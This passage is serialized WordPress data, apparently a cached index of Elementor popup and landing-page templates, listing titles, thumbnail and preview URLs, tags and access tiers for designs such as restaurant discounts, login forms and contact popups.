Organization\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/11-Environmental-Organization-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647274384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/hello-bar-cta-popup-environmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:133;a:21:{s:4:\"tmpl\";i:1256;s:2:\"id\";i:22195;s:5:\"title\";s:39:\"Classic | Discount | Italian Restaurant\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/restaurant-small.jpg\";s:12:\"tmpl_created\";i:1647329432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-discount-popup-italian-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Restaurant\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:134;a:21:{s:4:\"tmpl\";i:1257;s:2:\"id\";i:22210;s:5:\"title\";s:45:\"Bottom Bar | Discount | Technology Conference\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tech-conference-small.jpg\";s:12:\"tmpl_created\";i:1647330423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/bottom-bar-discount-popup-technology-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:38:\"[\"Conference\",\"Sales\",\"Save the Date\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:135;a:21:{s:4:\"tmpl\";i:1258;s:2:\"id\";i:22221;s:5:\"title\";s:32:\"Hello Bar | Menu | Tattoo Studio\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small-1.jpg\";s:12:\"tmpl_created\";i:1647330705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/hello-bar-menu-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:17:\"[\"Header\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:136;a:21:{s:4:\"tmpl\";i:1259;s:2:\"id\";i:22231;s:5:\"title\";s:37:\"Full Screen | Booking | Tattoo Studio\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small.jpg\";s:12:\"tmpl_created\";i:1647331823;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-booking-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:137;a:21:{s:4:\"tmpl\";i:1260;s:2:\"id\";i:22251;s:5:\"title\";s:34:\"Classic | Discount | Dental Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/dental-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647332171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-popup-dental-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Health\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:138;a:21:{s:4:\"tmpl\";i:1261;s:2:\"id\";i:22261;s:5:\"title\";s:34:\"Slide-In | Contact | Makeup Artist\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/20-Makeup-Artist-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647333946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/slide-in-contact-popup-makeup-artist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:139;a:21:{s:4:\"tmpl\";i:1262;s:2:\"id\";i:22271;s:5:\"title\";s:24:\"Fly-In | CTA | Headphone\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/headphones-1-small.jpg\";s:12:\"tmpl_created\";i:1647334784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-cta-popup-headphone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:41:\"[\"cta\",\"Ecommerce\",\"Marketing\",\"Product\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:140;a:21:{s:4:\"tmpl\";i:1263;s:2:\"id\";i:22277;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/online-course-2.jpg\";s:12:\"tmpl_created\";i:1647337110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-popup-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Course Online\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:141;a:21:{s:4:\"tmpl\";i:1264;s:2:\"id\";i:22283;s:5:\"title\";s:40:\"Bottom Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistant-3.jpg\";s:12:\"tmpl_created\";i:1647337517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-contact-popup-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:142;a:21:{s:4:\"tmpl\";i:1265;s:2:\"id\";i:22289;s:5:\"title\";s:32:\"Fly-In | Contact | Private Tutor\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-4.jpg\";s:12:\"tmpl_created\";i:1647337676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-contact-popup-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:27:\"[\"Contact\",\"Course Online\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:143;a:21:{s:4:\"tmpl\";i:1266;s:2:\"id\";i:22295;s:5:\"title\";s:31:\"Classic |  Login | Login Travel\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/login-travel-6.jpg\";s:12:\"tmpl_created\";i:1647339467;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-login-popup-login-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:144;a:21:{s:4:\"tmpl\";i:1267;s:2:\"id\";i:22301;s:5:\"title\";s:36:\"Full Screen | Login | Login Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/login-business-7.jpg\";s:12:\"tmpl_created\";i:1647339782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/full-screen-login-popup-login-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:16:\"[\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:145;a:21:{s:4:\"tmpl\";i:1268;s:2:\"id\";i:22307;s:5:\"title\";s:28:\"Classic | Login | Login Blog\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/login-blog-8.jpg\";s:12:\"tmpl_created\";i:1647339986;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-login-popup-login-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:146;a:21:{s:4:\"tmpl\";i:1269;s:2:\"id\";i:22313;s:5:\"title\";s:31:\"Classic | Login | Login Fashion\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/login-fashion-9.jpg\";s:12:\"tmpl_created\";i:1647340204;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-login-popup-login-fashion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Fashion\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:147;a:21:{s:4:\"tmpl\";i:1270;s:2:\"id\";i:22319;s:5:\"title\";s:40:\"Classic |  Login | Login Design Platform\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/03/login-design-platform-10.jpg\";s:12:\"tmpl_created\";i:1647340531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-login-popup-login-design-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Design\",\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:148;a:21:{s:4:\"tmpl\";i:1271;s:2:\"id\";i:22325;s:5:\"title\";s:36:\"Fly-In | Contact | Digital Marketing\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-marketing-11.jpg\";s:12:\"tmpl_created\";i:1647340770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-contact-popup-digital-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:51:\"[\"Business\",\"Contact\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:149;a:21:{s:4:\"tmpl\";i:1272;s:2:\"id\";i:22331;s:5:\"title\";s:36:\"Fly-In | CTA | Dog Cat Food Delivery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/dog-cat-food-delivery-5.jpg\";s:12:\"tmpl_created\";i:1647341069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-cta-popup-dog-cat-food-delivery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Delivery Service\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:150;a:21:{s:4:\"tmpl\";i:1273;s:2:\"id\";i:22337;s:5:\"title\";s:37:\"Full Screen | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-12.jpg\";s:12:\"tmpl_created\";i:1647341370;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-contact-popup-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:151;a:21:{s:4:\"tmpl\";i:1274;s:2:\"id\";i:22343;s:5:\"title\";s:44:\"Classic | Contact | Support Product Platform\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/03/support-13.jpg\";s:12:\"tmpl_created\";i:1647341972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-contact-support-product-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Contact\",\"Support\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:152;a:21:{s:4:\"tmpl\";i:1275;s:2:\"id\";i:22371;s:5:\"title\";s:38:\"Full Screen | Contact | Small Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/small-business-14.jpg\";s:12:\"tmpl_created\";i:1647342508;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-contact-small-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:40:\"[\"Business\",\"Contact\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:153;a:21:{s:4:\"tmpl\";i:1276;s:2:\"id\";i:22377;s:5:\"title\";s:31:\"Classic | Contact | Online Shop\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/online-shop-15.jpg\";s:12:\"tmpl_created\";i:1647352786;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-online-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:154;a:21:{s:4:\"tmpl\";i:1277;s:2:\"id\";i:22383;s:5:\"title\";s:40:\"Classic | Booking | Children Optometrist\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/children-optometrist-16.jpg\";s:12:\"tmpl_created\";i:1647352963;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-booking-children-optometrist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:53:\"[\"Booking\",\"Business\",\"Contact\",\"Education\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:155;a:21:{s:4:\"tmpl\";i:1278;s:2:\"id\";i:22389;s:5:\"title\";s:28:\"Fly-In | Contact | Open Week\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/03/open-week17.jpg\";s:12:\"tmpl_created\";i:1647353281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-open-week/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:34:\"[\"Business\",\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:156;a:21:{s:4:\"tmpl\";i:1279;s:2:\"id\";i:22397;s:5:\"title\";s:43:\"Full Screen | CTA | Plant Pots Online Store\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/plant-pots-online-store-18.jpg\";s:12:\"tmpl_created\";i:1647353429;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-cta-plant-pots-online-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:33:\"[\"Ecommerce\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:157;a:21:{s:4:\"tmpl\";i:1054;s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:762;s:11:\"trend_index\";i:650;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:158;a:21:{s:4:\"tmpl\";i:1398;s:2:\"id\";i:23687;s:5:\"title\";s:32:\"Pizza Promotion &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/48-Pizza-Promotion.jpg\";s:12:\"tmpl_created\";i:1649670575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/pizza-promotion-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:92:\"[\"Business\",\"Cooking\",\"Delivery\",\"Discount\",\"Fast Food\",\"Food\",\"Landing 